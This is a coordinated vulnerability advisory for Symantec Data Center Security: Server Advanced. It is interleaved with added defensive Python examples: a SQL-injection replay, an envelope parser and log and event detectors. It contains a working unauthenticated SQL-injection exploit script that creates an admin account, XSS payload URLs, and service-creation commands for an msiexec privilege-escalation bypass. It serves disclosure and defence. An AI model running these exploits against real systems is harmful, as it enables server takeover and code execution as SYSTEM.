Multiple critical vulnerabilities in Symantec Data Center Security: Server Advanced

SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >

=======================================================================

title: Multiple critical vulnerabilities

products: Symantec Data Center Security: Server Advanced (SDCS:SA)

Symantec Critical System Protection (SCSP)

vulnerable version: see: Vulnerable / tested versions

fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all

vulnerabilities were fixed, but mitigations exist

impact: Critical

CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226

homepage: www.symantec.com

found: 2014-09-19

by: Stefan Viehböck

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

Vendor description:

-------------------

"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)

extends the Data Center Security: Server solution beyond agentless threat

protections by incorporating technologies previously known as Critical System

Protection. Data Center Security: Server Advanced provides granular, policy-

based controls with a low impact in-guest agent to monitor and protect numerous

physical and virtual server environments. Through a combination of technologies

including application-centric controls including protected white listing,

sandboxing using least privilege access controls, host-based intrusion detection

(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),

organizations can proactively safeguard their heterogeneous server environments

and the information they contain from zero-day and targeted attacks, and fulfill

their compliance mandates across critical systems. Click here for more info"

Source:

www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products

 

Business recommendation:

------------------------

Attackers are able to completely compromise the SDCS:SA Server as they can gain

access at the system and database level. Furthermore attackers can manage all

clients and their policies.

SDCS:SA Server can be used as an entry point into the target infrastructure

(lateral movement, privilege escalation).

Furthermore the SDCS:SA Client protections can be bypassed in several ways.

It is highly recommended by SEC Consult not to use this software until a

thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been

performed by security professionals and all identified issues have been

resolved.

Note: SCSP was superseded by SDCS:SA. In this document the name SDCS:SA is used.

 

Vulnerability overview/description:

-----------------------------------

1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)

Due to insufficient input validation, the application allows the injection

of direct SQL commands. By exploiting the vulnerability, an attacker gains

access (read/write) to all records stored in the database as arbitrary SQL

statements can be executed.

Furthermore the application design enables an attacker to gain code execution

as SYSTEM (highest privilege Windows user) on the server by exploiting this

vulnerability.

No prior authentication is needed to exploit this vulnerability.

Affected script:

https://<host>:4443/sis-ui/authenticate

 

2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)

The application suffers from a reflected cross-site scripting vulnerability,

which allows an attacker to steal other users' sessions, to impersonate other

users and to gain unauthorized access to the admin interface.

Affected scripts:

https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp

https://<host>:8081/webui/admin/WCUnsupportedClass.jsp

 

3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)

A script discloses internal information about the application on the server

without prior authentication. This information includes file paths on the

web server and version information (OS, Java).

Affected script:

https://<host>:8081/webui/admin/environment.jsp

 

4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)

(CVE-2014-9226)

Several bypasses were discovered. All of them require Windows Administrator

permissions on the protected host. As SDCS:SA is meant to confine even

administrative users, this requirement is usually met in SDCS:SA deployments.

Note: SEC Consult did not check whether the mitigations provided by Symantec do

in fact sufficiently mitigate these vulnerabilities!

- Persistent code execution via Windows Services

The default Symantec policy rules can be bypassed in order to get persistent

arbitrary code execution.

- Remote code execution via RPC

The same default policy rules can be bypassed remotely: "psexec-style" remote

code execution via SMB (file copy) and RPC (service installation) is possible

and yields persistent arbitrary code execution on the protected host.

- Policy bypass: Extraction of Windows passwords/hashes

The default Symantec policy rules do not prevent attackers from extracting

the Windows passwords/password hashes from the System.

- Privilege elevation via Windows Installer (msiexec.exe)

The restrictions imposed by the default policies can be bypassed entirely by

exploiting incorrect assumptions made in the policy regarding the Windows

Installer (msiexec.exe).

- Privilege elevation/code execution via Windows Management Instrumentation

(.mof files)

The restrictions imposed by default policies can be bypassed partially by

exploiting incorrect assumptions made in the policy regarding the Windows

Management Instrumentation. The policy does not account for OS functionality

that is intended to execute code.

Proof of concept:

-----------------

1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)

The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is

vulnerable to SQL injection. By sending a specially crafted HTTP request,

arbitrary SQL statements can be executed.

In a proof of concept exploit, SQL statements to add a new SDCS:SA user with

admin privileges (username: secconsult, password: PASSWORD123!) were executed.

These statements are:

INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', 
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
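The following Python example is added by the editor and is not part of the
SEC Consult advisory. It replays the two injected statements against an
in-memory SQLite copy of the USR and ROLEMAP tables (column names are taken from
the statements above; the column types, ROLERID 1 being the administrator role
and BUILTIN marking install-time accounts are assumptions, and the real backend
is Microsoft SQL Server, so SQLite only stands in to run the statements
offline). It shows the login lookup in the flawed shape that lets stacked
statements run, the parameterised lookup that would have stopped the
injection, and the audit query a defender would run afterwards to find accounts
added this way:

```python
"""Replay the injected SDCS:SA statements in SQLite and audit for rogue admins.

Added example, not part of the advisory. Column types, the meaning of
ROLERID 1 (admin role) and BUILTIN ('1' = created at install) are assumptions.
"""
import sqlite3

SCHEMA = """
CREATE TABLE USR (
    RID INTEGER PRIMARY KEY, USERNAME TEXT, PWD TEXT, CONTACT_NAME TEXT, PHONES TEXT,
    EMAIL TEXT, ALERT_EMAIL TEXT, ADDRESS TEXT, MANAGER_NAME TEXT, BUSINESS_INFO TEXT,
    PREF_LANGUAGE TEXT, FLAGS INTEGER, DESCR TEXT, CREATETIME TEXT, MODTIME TEXT,
    ENABLED TEXT, BUILTIN TEXT, HIDDEN TEXT, SALT TEXT);
CREATE TABLE ROLEMAP (USERRID INTEGER, ROLERID INTEGER);
"""

# Constructed baseline: the built-in administrator created at install time.
BASELINE = """
INSERT INTO USR (RID, USERNAME, PWD, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1, 'symadmin', 'hash', 'Built-in administrator', '2014-01-10 09:00:00',
        '2014-01-10 09:00:00', '1', '1', '0', 'salt');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1, 1);
"""

# The statements the exploit stacks behind the login query (from the advisory).
# Both are sent in one payload here; the original PoC sends them in two requests.
INJECTED_SQL = (
    "INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, "
    "ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, "
    "MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', "
    "'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', "
    "NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', "
    "'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); "
    "INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);"
)
# What goes into the 'un' field: close the string, stack the statements, comment out the rest.
INJECTED_USERNAME = "AAAAAAAAAAAAAA'; " + INJECTED_SQL + " -- ''"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA + BASELINE)
    return conn


def vulnerable_lookup(conn, username):
    """Assumed shape of the flawed server code: the username is concatenated into
    the query and the driver accepts stacked statements, so everything after the
    closing quote runs as SQL."""
    conn.executescript("SELECT RID FROM USR WHERE USERNAME = '%s';" % username)


def safe_lookup(conn, username):
    """Hardened form: a bound parameter is data, never SQL. Returns matching RIDs."""
    rows = conn.execute("SELECT RID FROM USR WHERE USERNAME = ?", (username,))
    return [row[0] for row in rows]


def non_builtin_admins(conn):
    """Audit query: every account holding the admin role that was not created at install."""
    return conn.execute("""
        SELECT u.RID, u.USERNAME, u.DESCR, u.CREATETIME
        FROM USR u JOIN ROLEMAP r ON r.USERRID = u.RID
        WHERE r.ROLERID = 1 AND u.BUILTIN = '0'
        ORDER BY u.RID""").fetchall()


if __name__ == "__main__":
    db = fresh_db()
    vulnerable_lookup(db, INJECTED_USERNAME)
    for rid, name, descr, created in non_builtin_admins(db):
        print("rogue admin: RID=%d USERNAME=%s DESCR=%s created %s" % (rid, name, descr, created))
```

On a live system the same audit query, run against the SDCS:SA database,
lists every administrator that was not created by the installer; an entry with
an unfamiliar name, an odd DESCR or a CREATETIME outside normal change windows
is the artefact this exploit leaves behind.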

The code used to exploit the SQL injection vulnerability is listed below:

import http.client
import ssl

def send_request(host, payload):
    # POST the raw AppFire envelope to the authentication servlet. The request
    # headers mirror those sent by the SDCS:SA Java management console.
    headers = {"AppFire-Format-Version": "1.0",
               "AppFire-Charset": "UTF-16LE",
               "Content-Type": "application/x-appfire",
               "User-Agent": "Java/1.7.0_45",
               }
    # Certificate verification is disabled so the PoC also works against a
    # self-signed management server certificate (assumption about the deployment).
    conn = http.client.HTTPSConnection(host, context=ssl._create_unverified_context())
    conn.request("POST", "/sis-ui/authenticate", payload, headers)
    response = conn.getresponse()
    body = response.read()
    conn.close()
    return response, body

# Envelope: plain-text header, blank line, Data-Length bytes of UTF-16LE
# key=value properties, then an EOF_FLAG trailer.
header = "Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
# The 'un' (username) property carries the injection: the quote closes the
# string literal, the stacked INSERT runs, and '--' comments out the rest of
# the original query.
data = "ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' "  # add user to USR table
#data = "ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- "  # add user to admin group (sent as a second request)
data += "\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')

eof_flag = "\nEOF_FLAG\n"
header = header % (len(data))  # Data-Length counts the UTF-16LE bytes
payload = header.encode('ascii') + data + eof_flag.encode('ascii')

response, body = send_request("<host>:4443", payload)

print(body.decode('utf-16le'))
print(response.status)
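As an added example (not the advisory's code), the following Python parses the
AppFire "properties" envelope that the proof of concept builds. The framing is
inferred from the PoC: a text header, a blank line, Data-Length bytes of
UTF-16LE key=value pairs separated by CRLF, and an EOF_FLAG trailer. Because
the body is UTF-16LE, ASCII signatures on the wire never see the injected
username; a reverse proxy or IDS preprocessor in front of port 4443 has to
decode the envelope first, which is what this does before checking the `un`
property for injection indicators. Property names other than `un` are assumed
to be opaque:

```python
"""Parse the AppFire 'properties' envelope used by /sis-ui/authenticate.

Added example, not the SEC Consult exploit code. Framing inferred from the
proof of concept: text header, blank line, Data-Length bytes of UTF-16LE
key=value pairs separated by CRLF, then an EOF_FLAG trailer.
"""
import re

EOF_FLAG = b"\nEOF_FLAG\n"
HEADER_FMT = "Data-Format=text/plain\nData-Type=properties\nData-Length=%d\n\n"
# Quote-break followed by a stacked statement or a comment, as in the PoC payload.
SQLI_RE = re.compile(r"'\s*;|--|;\s*(?:insert|update|delete|drop|exec)\b", re.IGNORECASE)


def build_envelope(props):
    """Encode key=value pairs exactly as the PoC does (used here to build input)."""
    body = "".join("%s=%s\r\n" % (k, v) for k, v in props.items()).encode("utf-16le")
    return (HEADER_FMT % len(body)).encode("ascii") + body + EOF_FLAG


def parse_envelope(raw):
    """Return (header_dict, props_dict); raise ValueError on malformed framing."""
    head, sep, rest = raw.partition(b"\n\n")
    if not sep:
        raise ValueError("missing header terminator")
    header = {}
    for line in head.decode("ascii", "replace").split("\n"):
        key, eq, value = line.partition("=")
        if eq:
            header[key] = value
    try:
        length = int(header.get("Data-Length", ""))
    except ValueError:
        raise ValueError("missing or non-numeric Data-Length")
    if length < 0 or len(rest) < length:
        raise ValueError("Data-Length exceeds body")
    body, trailer = rest[:length], rest[length:]
    if trailer != EOF_FLAG:
        raise ValueError("body length does not match Data-Length or EOF_FLAG missing")
    props = {}
    # UTF-16LE decoding raises UnicodeDecodeError (a ValueError) on odd lengths.
    for line in body.decode("utf-16le").split("\r\n"):
        key, eq, value = line.partition("=")
        if eq:
            props[key] = value
    return header, props


def sqli_indicators(props):
    """Names of the properties whose values look like SQL injection attempts."""
    return [k for k, v in props.items() if SQLI_RE.search(v)]


if __name__ == "__main__":
    raw = build_envelope({"ai": "2",
                          "un": "AAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- ",
                          "pwd": "x"})
    hdr, props = parse_envelope(raw)
    print(hdr["Data-Length"], props["un"], sqli_indicators(props))
```

The strict framing checks matter as much as the pattern match: a decoder that
trusts Data-Length without verifying the trailer can be made to skip over the
injected bytes, so a mismatch is treated as an error rather than tolerated.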

 

As the application users also act as Tomcat administrators, an attacker can log

in to the Tomcat manager with the injected account. The Tomcat manager is

available by default via TCP port 8081 (HTTPS).

The Tomcat Web Application Manager can be used to deploy new .war files

containing attacker-controlled Java code. This allows an attacker to execute

arbitrary commands on the operating system with the privileges of the

"Symantec Data Center Security Server Manager" service (SISManager), which

runs as SYSTEM.
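Added detection example (not part of the advisory) for the Tomcat manager
step: it scans the management server's Tomcat access log for requests to the
manager application and for successful deploy/upload requests, and extracts
the deployed context path so the responder knows which web application to
pull off the server. It assumes the stock Tomcat access log pattern
`%h %l %u %t "%r" %s %b` and the standard manager endpoint paths
(/manager/text/deploy, /manager/html/upload, /manager/deploy on older Tomcat);
the log lines are constructed:

```python
"""Flag Tomcat manager activity in the SDCS:SA server's access log (TCP 8081).

Added example, not part of the advisory. Assumes the stock Tomcat access log
pattern %h %l %u %t "%r" %s %b and the standard manager endpoints.
"""
import re
from urllib.parse import urlsplit, parse_qs

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+$')
# Text-interface and HTML-interface deployment endpoints (Tomcat 6 used /manager/deploy).
DEPLOY_RE = re.compile(r'^/manager/(?:text/|html/)?(?:deploy|upload)$')

SAMPLE_LOG = [  # constructed lines
    '10.0.0.5 - - [22/Jan/2015:10:14:02 +0100] "GET /webui/login.jsp HTTP/1.1" 200 2048',
    '10.0.0.5 - secconsult [22/Jan/2015:10:15:32 +0100] "PUT /manager/text/deploy?path=/evil&update=true HTTP/1.1" 200 51',
    '10.0.0.5 - secconsult [22/Jan/2015:10:15:40 +0100] "GET /evil/cmd.jsp?cmd=whoami HTTP/1.1" 200 120',
    '10.0.0.9 - - [22/Jan/2015:10:16:00 +0100] "GET /manager/html HTTP/1.1" 401 0',
    'garbage line that does not parse',
]


def parse_access_line(line):
    """Return the fields of one access log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def manager_requests(lines):
    """Every parsed request under /manager, successful or not. Repeated 401s from
    a host that never authenticates successfully suggest credential guessing."""
    out = []
    for line in lines:
        rec = parse_access_line(line)
        if rec and urlsplit(rec["target"]).path.startswith("/manager"):
            out.append((rec["time"], rec["host"], rec["user"], rec["method"],
                        rec["target"], rec["status"]))
    return out


def successful_deployments(lines):
    """(time, host, user, context) for each 2xx deploy/upload request. The HTML
    upload form carries the WAR in a multipart body, so its context is None."""
    out = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if DEPLOY_RE.match(url.path) and rec["status"].startswith("2"):
            context = parse_qs(url.query).get("path", [None])[0]
            out.append((rec["time"], rec["host"], rec["user"], context))
    return out


if __name__ == "__main__":
    for entry in successful_deployments(SAMPLE_LOG):
        print("WAR deployed:", entry)
    for entry in manager_requests(SAMPLE_LOG):
        print("manager access:", entry)
```

A deployment by a user that does not appear in the normal administrator list,
or any deployment at all on a server whose policy content is only ever changed
through the management console, is worth treating as an incident; the context
path from the query string points at the webapp directory to preserve before
the attacker undeploys it.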

 

2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)

At least the following URLs are vulnerable to XSS:

https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>

https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>

 

3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)

The following URL discloses internal information:

https://example.com:8081/webui/admin/environment.jsp

 

4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)

(CVE-2014-9226)

- Persistent code execution via Windows Services

The default policy rules only cover service binaries ending in ".exe", but

Windows service binaries can have any file extension. This allows an attacker

to execute arbitrary files as services and thereby run malicious code

automatically at OS boot.

- Remote code execution via RPC

Existing tools like "psexec" or Metasploit (exploit/windows/smb/psexec) can

be modified to write service binaries not ending in ".exe" on the target system.

- Policy bypass: Extraction of Windows passwords/hashes

The tool "mimikatz" can be used to extract Windows credentials.

- Privilege elevation via Windows Installer (msiexec.exe)

msiexec.exe is granted "safe privileges" when it is started as a service. The

policy assumes this only happens for the "Windows Installer" service, which

starts msiexec.exe with the "/V" parameter, but any service can be registered

with msiexec.exe as its binary. An attacker creates a service that starts

msiexec.exe with the parameters "/quiet", "/i" and the path to a valid .msi

file. Upon service start the .msi file is executed with "safe privileges" and

is not subject to any SDCS:SA Client checks.

sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore

net start evil_service

- Privilege elevation/code execution via Windows Management Instrumentation

(.mof files)

On older Windows versions, .mof files placed in "%SystemRoot%\System32\wbem\mof\"

are automatically compiled by WMI; a malicious .mof file therefore yields

arbitrary code execution. The code runs with "def_winsvcs_ps" permissions.
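Added detection example (not from the advisory) for the client-side bypasses
above: it evaluates service installations (Windows System log event 7045,
fields ServiceName, ImagePath, AccountName) and file creations (Sysmon event
11, field TargetFilename) against three rules derived from this section: a
service binary that does not end in .exe (the Windows Services and
psexec-style bypasses), msiexec.exe registered as a service binary with
anything other than the Windows Installer's own "/V" switch, and a .mof file
written to the WMI autocompile folder. The event records are constructed;
the field names follow the Windows and Sysmon event schemas:

```python
"""Detect the SDCS:SA client policy bypasses from service-install and
file-create events.

Added example, not part of the advisory. Events are dicts with the fields of
Windows System log event 7045 (ServiceName, ImagePath, AccountName) and Sysmon
event 11 (TargetFilename); the sample events below are constructed.
"""
import ntpath

# WMI autocompile folder, literal and %SystemRoot% forms, lower-cased for matching.
MOF_DIRS = ("c:\\windows\\system32\\wbem\\mof\\", "%systemroot%\\system32\\wbem\\mof\\")


def split_image_path(image_path):
    """Split a service ImagePath into (executable, arguments).

    A quoted path is taken verbatim. An unquoted path is extended token by
    token until it ends in .exe, mirroring how Windows resolves paths with
    spaces; if no prefix ends in .exe the first token is the binary, which is
    exactly the non-.exe service binary the bypass relies on."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end != -1:
            return s[1:end], s[end + 1:].strip()
    tokens = s.split(" ")
    for i in range(1, len(tokens) + 1):
        candidate = " ".join(tokens[:i])
        if candidate.lower().endswith(".exe"):
            return candidate, " ".join(tokens[i:]).strip()
    return tokens[0], " ".join(tokens[1:]).strip()


def evaluate(event):
    """Return (rule, detail) findings for a single event."""
    findings = []
    if event.get("EventID") == 7045:
        exe, args = split_image_path(event["ImagePath"])
        name = ntpath.basename(exe).lower()
        if not name.endswith(".exe"):
            # Windows Services / psexec-style bypass: binary outside the .exe rules.
            findings.append(("service-binary-not-exe", "%s -> %s" % (event["ServiceName"], exe)))
        if name == "msiexec.exe" and args.lower() != "/v":
            # msiexec bypass: only the Windows Installer service itself runs "msiexec.exe /V".
            findings.append(("msiexec-as-service", "%s -> msiexec.exe %s" % (event["ServiceName"], args)))
    elif event.get("EventID") == 11:
        target = event["TargetFilename"].lower()
        if target.endswith(".mof") and target.startswith(MOF_DIRS):
            findings.append(("mof-autocompile-drop", event["TargetFilename"]))
    return findings


def scan(events):
    return [finding for event in events for finding in evaluate(event)]


SAMPLE_EVENTS = [  # constructed
    {"EventID": 7045, "ServiceName": "Windows Installer",
     "ImagePath": "%systemroot%\\system32\\msiexec.exe /V", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "evil_service",
     "ImagePath": "c:\\windows\\System32\\msiexec.exe /quiet /i c:\\temp\\evil_msi", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "updatersvc",
     "ImagePath": "C:\\ProgramData\\upd\\svc.dat", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "GoodAgent",
     "ImagePath": "\"C:\\Program Files\\Vendor\\agent.exe\" -svc", "AccountName": "LocalSystem"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\Windows\\System32\\wbem\\mof\\persist.mof"},
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print("%-24s %s" % (rule, detail))
```

The rules are deliberately host-independent: they look at what the Service
Control Manager was asked to run rather than at the file on disk, so they still
fire when the attacker removes the dropped binary after the service has been
registered, and they do not depend on the SDCS:SA agent, which is the component
being bypassed.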

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in Symantec Data Center

Security: Server Advanced version 6.0, which was the most recent version at

the time of discovery.

However other versions (SCSP 5.2.9) are affected by the vulnerabilities as

well. See the vendor information in the Solution section.

 

Vendor contact timeline:

------------------------

2014-10-20: Sending advisory and proof of concept exploit via encrypted

channel.

2014-10-20: Vendor acknowledges receipt of advisory.

2014-11-18: Requesting status update.

2014-11-18: Vendor responds and informs about an advisory in December,

version containing fixes in February.

2014-12-04: Vendor informs about delays in releasing fixes/mitigations,

target release date mid-January.

2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).

2015-01-17: Vendor releases fixes for SCSP.

2015-01-19: Vendor releases advisory and mitigations for SCSP/SDCS:SA.

2015-01-22: SEC Consult releases coordinated security advisory.

 

Solution:

---------

Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).

Not all vulnerabilities are fixed by this update! However, Symantec has

provided mitigations for the remaining issues.

More information can be found at:

www.symantec.com/security_response/securityupdates/detail.jsp

www.symantec.com/business/support/index

 

Workaround:

-----------

See solution.

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarters:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

Interested to work with the experts of SEC Consult?

Write to career@sec-consult.com

EOF Stefan Viehböck / @2015